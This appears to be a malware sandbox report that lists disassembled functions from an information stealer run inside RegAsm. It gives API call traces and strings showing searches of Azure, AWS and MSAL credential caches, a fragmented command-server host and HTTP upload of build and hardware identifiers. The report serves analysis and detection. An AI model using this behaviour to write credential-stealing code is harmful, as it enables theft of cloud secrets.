API ID: lstrlen$lstrcpy$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-608462545
Opcode ID: feb3d2a726b68aad2bc47e55e59194f6274ab8656105d26091bcae1cbec022c3
Instruction ID: c380a442c22d4a6f6b6b501b298ba4a24a493f2d26715ad5769ec934e4a293b5
Opcode Fuzzy Hash: feb3d2a726b68aad2bc47e55e59194f6274ab8656105d26091bcae1cbec022c3
Instruction Fuzzy Hash: 83914E71E40119ABCF10FBA6DD47ACC7771AF04308F51402BF904B7191DBB8AE898B98

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: a4c6434a9d896b8c05fe3589387c5a0ab5990a3deb65ea94288cc25d28575b73
Instruction ID: 7b9a5a96d4ba9701844ef46366e4f30bb8287ab9eabac308b73492efbeb07c71
Opcode Fuzzy Hash: a4c6434a9d896b8c05fe3589387c5a0ab5990a3deb65ea94288cc25d28575b73
Instruction Fuzzy Hash: 1341C6B1900218ABDB205F61AC4CF9F7B7DEB85715F1002BAF10AE10A1DA354A54CF38

Function 00416486 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 114
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004164AB

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004164CA
lstrcatA.KERNEL32(?,\.azure\), ref: 004164E7

Part of subcall function 00415F9A: wsprintfA.USER32 ref: 00415FE1
Part of subcall function 00415F9A: FindFirstFileA.KERNEL32(?,?), ref: 00415FF8
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436AAC), ref: 00416019
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436AB0), ref: 00416033
Part of subcall function 00415F9A: wsprintfA.USER32 ref: 0041605A
Part of subcall function 00415F9A: StrCmpCA.SHLWAPI(?,00436647), ref: 0041606E
Part of subcall function 00415F9A: wsprintfA.USER32 ref: 0041608B
Part of subcall function 00415F9A: PathMatchSpecA.SHLWAPI(?,?), ref: 004160B8
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?), ref: 004160EE
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,00436AC8), ref: 00416100
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,?), ref: 00416113
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,00436ACC), ref: 00416125
Part of subcall function 00415F9A: lstrcatA.KERNEL32(?,?), ref: 00416139

_memset.LIBCMT ref: 0041651F
lstrcatA.KERNEL32(?,00000000), ref: 00416541
lstrcatA.KERNEL32(?,\.aws\), ref: 0041655E

Part of subcall function 00415F9A: wsprintfA.USER32 ref: 004160A2
Part of subcall function 00415F9A: FindNextFileA.KERNEL32(?,?), ref: 004162C8
Part of subcall function 00415F9A: FindClose.KERNEL32(?), ref: 004162DC

_memset.LIBCMT ref: 00416593
lstrcatA.KERNEL32(?,00000000), ref: 004165B5
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 004165D2
_memset.LIBCMT ref: 00416607

Strings

msal.cache, xrefs: 004165E7
Azure\.azure, xrefs: 004164FA
\.aws\, xrefs: 00416552
Azure\.IdentityService, xrefs: 004165E2
*.*, xrefs: 00416573
\.azure\, xrefs: 004164DB
Azure\.aws, xrefs: 0041656E
*.*, xrefs: 004164FF
YzA, xrefs: 00416619
\.IdentityService\, xrefs: 004165C6

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$YzA$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-362661257
Opcode ID: ae9bc2b4159648a03df1d8199bceb4a7e4afc74ceae7735b5587b2c0e23e741f
Instruction ID: e09d3565937ed7cb3245d894ae8b678399d548b41c077326798facb81f997529
Opcode Fuzzy Hash: ae9bc2b4159648a03df1d8199bceb4a7e4afc74ceae7735b5587b2c0e23e741f
Instruction Fuzzy Hash: 87410671D4021D6ACB14FB61EC47FDD7378AB09308F5044AAB605B70D1EAB9AB888F58

Function 00404B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436967,",build_id,004377BC,------,004377B0,",hwid,0043779C,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404DFB
hwid, xrefs: 00404EAD
", xrefs: 00404ED9
------, xrefs: 00404C75
------, xrefs: 00404F5B
build_id, xrefs: 0040500D
", xrefs: 00405039

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$build_id$hwid
API String ID: 3006978581-3960666492
Opcode ID: 5a40ead41b59bc4fb13792177cfebe8882ebf35e0c97df3617a695cbe89f5321
Instruction ID: dfbc783d11866e726b8d78bab9461151912d3a7d9eee88907fb077fc5923263b
Opcode Fuzzy Hash: 5a40ead41b59bc4fb13792177cfebe8882ebf35e0c97df3617a695cbe89f5321
Instruction Fuzzy Hash: 1E02C371D5512A9ACF20EB21CD46ADDB3B5FF04308F4140E6A548B3195DAB87ECA8FD8

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373C8,0043680E,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373D4,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373D8), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373DC), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E0), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: f8360c7b20f5c763c3fe5353f3bf17e43d3046bd4b5fca662abcecd2461d19c4
Instruction ID: cb12ae993d912c3b022d06b06e2c92592983fa858de450ac94d351c27304df7b
Opcode Fuzzy Hash: f8360c7b20f5c763c3fe5353f3bf17e43d3046bd4b5fca662abcecd2461d19c4
Instruction Fuzzy Hash: D7C14D32904208AFDF15EBA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 0041700A Relevance: 30.8, APIs: 8, Strings: 9, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,00418558), ref: 004170A6
OpenEventA.KERNEL32(001F0003,00000000,?,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004170B5
CreateDirectoryA.KERNEL32(?,00000000,004366D6), ref: 004175D3
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417694
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176AD

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 0041398B: StrCmpCA.SHLWAPI(?,block,?,?,0041770D), ref: 004139A0
Part of subcall function 0041398B: ExitProcess.KERNEL32 ref: 004139AB

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413161: strtok_s.MSVCRT ref: 00413180
Part of subcall function 00413161: strtok_s.MSVCRT ref: 00413203

Sleep.KERNEL32(000003E8), ref: 00417A63

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00418558), ref: 004170C9

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417DFA,.exe,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4,00436CA0,00436C9C), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00417FC9

Strings

lC, xrefs: 00417E91, 00417EB5
58cd250b15e666e5f72fcf5caa6cb131, xrefs: 004176D5
cowod., xrefs: 00417E44
.exe, xrefs: 00417DCD
_DEBUG.zip, xrefs: 00417EFE
hopto, xrefs: 00417E68
http://, xrefs: 00417E20
.exe, xrefs: 00417512
org, xrefs: 00417EB0

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$58cd250b15e666e5f72fcf5caa6cb131$_DEBUG.zip$cowod.$hopto$http://$org$lC
API String ID: 305159127-1636128746
Opcode ID: 6d78f0ac804fd57a1086615410ebaa10ff6b96fde52fc882cf5b60deeac91281
Instruction ID: e6a5137aab0b02585c312a366981b90c2d2ef84b23aca7c17d1f9e0283a89aea
Opcode Fuzzy Hash: 6d78f0ac804fd57a1086615410ebaa10ff6b96fde52fc882cf5b60deeac91281
Instruction Fuzzy Hash: 839230715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 00413571 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135B3
StrCmpCA.SHLWAPI(?,true), ref: 00413675

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 00413737
lstrcpyA.KERNEL32(?,00000000), ref: 00413768
lstrcpyA.KERNEL32(?,00000000), ref: 004137A4
lstrcpyA.KERNEL32(?,00000000), ref: 004137E0
lstrcpyA.KERNEL32(?,00000000), ref: 0041381C
lstrcpyA.KERNEL32(?,00000000), ref: 00413858
lstrcpyA.KERNEL32(?,00000000), ref: 00413894
strtok_s.MSVCRT ref: 00413958

Strings

false, xrefs: 0041368E
true, xrefs: 0041366F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: befc15b187be6b2b38e80563b1c0e317862952651bbf4cbd0d99922f73119e34
Instruction ID: 65d56f248c55408504232a4b248d2aaf7f14f04557fc70ec434470b8b9719434
Opcode Fuzzy Hash: befc15b187be6b2b38e80563b1c0e317862952651bbf4cbd0d99922f73119e34
Instruction Fuzzy Hash: 39B16EB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

%xA, xrefs: 00405250, 00405457, 0040539E
GET, xrefs: 00405325

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: %xA$GET
API String ID: 442264750-965130897
Opcode ID: 6e67f2045e7124c2aa25c15faa48f360f59724c4703c0741eec176f7d6ab5e88
Instruction ID: 3956a683f80eaa871a06acf695807d3cf49717e7413e1f5c78720f785125ede4
Opcode Fuzzy Hash: 6e67f2045e7124c2aa25c15faa48f360f59724c4703c0741eec176f7d6ab5e88
Instruction Fuzzy Hash: D15119B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F54

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

